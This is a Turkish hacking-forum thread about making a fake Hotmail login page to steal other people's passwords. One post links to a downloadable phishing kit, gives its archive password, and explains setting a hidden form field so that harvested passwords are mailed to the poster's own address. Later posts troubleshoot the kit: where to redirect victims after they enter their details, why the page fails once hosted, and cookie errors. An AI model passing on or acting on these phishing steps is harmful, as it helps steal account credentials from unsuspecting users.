folder Tahribat.com Forumları
linefolder Skype - Mirc - Irc - Icq - Mail Güvenliği
linefolder HOTMAİL FAKE Açıklamalı Anlatım.. By Djburack

HOTMAİL FAKE Açıklamalı Anlatım.. By Djburack

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    turunc4u
    turunc4u's avatar
    Erkek
    ceza_ceza bunu yazdı:

bu daha basit ve garantili seçim sizin.

al dostum sana yüzde yüz fake mail hayırlı uğurlu olsun...

al buraya tıkla 2 http://rapidshare.de/files/3082789/quake_hacker61_gmx-de.rar.html

açılan sayfada free yazan yere bas sonra en alta dowload yazıyor inndir zip şifresi quake_hacker61'dir

metin belgesini aç orda böyle bir yer var <INPUT type=hidden value=şifre_gelecek@hotmail.com name=recipient>

şifre gelecek yazan yere kendi hotmail adresini yaz sonra dosyaya bas htm olarak kaydet al sana kendim denedim yüzde yüz çalışıyor bu arada verdiğim linkte kesinlikle hiç bir trojan falan yoktur tahribah.com adminleri bakabilirler.

arkadaş dediklerimi yap fake mailin hazır ve kesin çalışıyor.

bu arada bu yöntem bana ait değildir quake_hacker61'e aittir kendisine teşşekür ediyorum...

gercektende %100 çalışıyo trojanda yok ama almanca fake mail!!

Bunu kimsenin yiceğini sanmam.millet annamaz bile hotmail şifresini oraya yazması gerektiğini...

2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cky
    cky's avatar
    Erkek

abi harfiyen dediklerini yaptım hatta kendi e-mailimde denedim de kendi şifrem bile bana gelmedi....nası gelecek bu şifre??? form buddy de bilene yok be abiii.........help me please...

3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    psyk
    psyk's avatar
    Erkek
    ve_kurbanın_fakeyi_yedikten_sonra_girecegi_internet_adresini_buraya_yazin....>         k1sm1na  1sted1g1m1z  b1r s1tem1 yaz1caz (mesela www.hotmail.com) yoksa s1temaynettek1 fake sayfas1n1m1 yaz1caz ? (mesela www.faberr.8m.com/ekart.htm)

...
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    korkusuz
    korkusuz's avatar
    Erkek
    İlk fake cok güzeldi fakat onu ben html ye dönüştüremedim.Ama ikinci fakeyi kimse yemez arkadas bu öyle bi fake olcakki mesela hotmail.com adresinin mail bölümünde acılan, o ilk sayfayı yani login olabilinecek yeri verirseniz bu daha ii olur...
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    looksharp
    looksharp's avatar
    Erkek

ben en bastaki fakeyle ugrastim .. hersey tamam ama calismadi..

"No HTML allowed

The field url=www.mynet.com>  , ! , ; , # , | , & , \ and *."

yazisi cikti..  www.mynet.com u öylesine yazdim.. harfiyen uyguladım ama sanırım çalışmıyor.

6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    looksharp
    looksharp's avatar
    Erkek

Gmx fake maili calisiyor fakat Bu fake maili pc den acarsam calisiyor ama bu dosyayı bir web sitesine yüklediğimde calismiyor...
    Bu  problemi ortadan nasıl kaldırırız bilgisi olan var mı acaba?

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    expert
    expert's avatar
    Erkek

ya ilk fake i bende yaptm kendimde denedim herşey güsel giderken yane fake alıldıktan 5 sanie sonra bu yazı gelioo

Tanımlama bilgilerine izin verilmelidir

Tarayıcınız şu anda tanımlama bilgileri engellenecek şekilde ayarlanmış. Passport Network'ü kullanabilmeniz için önce tarayıcınızda tanımlama bilgilerine izin verilmelidir.

Tanımlama bilgileri bilgisayarınızda depolanan ve Passport Network sitelerinde ve hizmetlerinde ne zaman oturum açtığınızı belirten küçük metin dosyalarıdır. Tanımlama bilgilerine nasıl izin verileceğini öğrenmek için web tarayıcınızın çevrimiçi yardımına bakın.

yardıııım dj burack..!!!

la bi git xD çoğu konuyu okurum. çok azına post atarım :D çok önemliyse pm at.. kaanabak kardeşimm, seni unutmayacağım.. :(
Toplam Hit: 23001 Toplam Mesaj: 18